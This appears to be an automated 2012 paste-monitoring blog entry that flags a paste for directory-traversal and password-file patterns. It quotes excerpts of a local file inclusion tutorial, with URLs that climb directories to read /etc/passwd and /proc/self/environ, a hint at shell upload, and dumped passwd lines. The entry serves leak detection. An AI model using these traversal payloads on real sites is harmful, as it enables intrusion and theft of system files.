Potential leak of data: Directory Transversal
Detected 2 occurrence(s) of ‘http:\/\/.*\.\.\/\.\.\/\.\.’:
below: Click this bar to view the original image of 743x170px. You can see here that i found the exact path after putting 19 "../" before "../etc/passwd". Â You have completed half of your exploit: Â Now suppose that our injection path looks like -Â http://www.site.com/index.php?cat=../../../../../../etc/passwd Now you have to do is that just replace "etc/passwd" with "proc/self/environ" and you will some codes like shown below: Click this bar to view the original image of 775x363px. Â Uploading shellNow we have to use Tamper Data to edit our user
Detected 1 occurrence(s) of ‘root:.*:0:0:’:
lude]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 so we go more directories up www.website.com/view.php?page=../../../../../etc/passwd we succesfully included the etc/passwd file. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown hal
This entry was posted on Friday, July 27th, 2012 at 06:45 and is filed under PasteMon. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.
Comments are closed.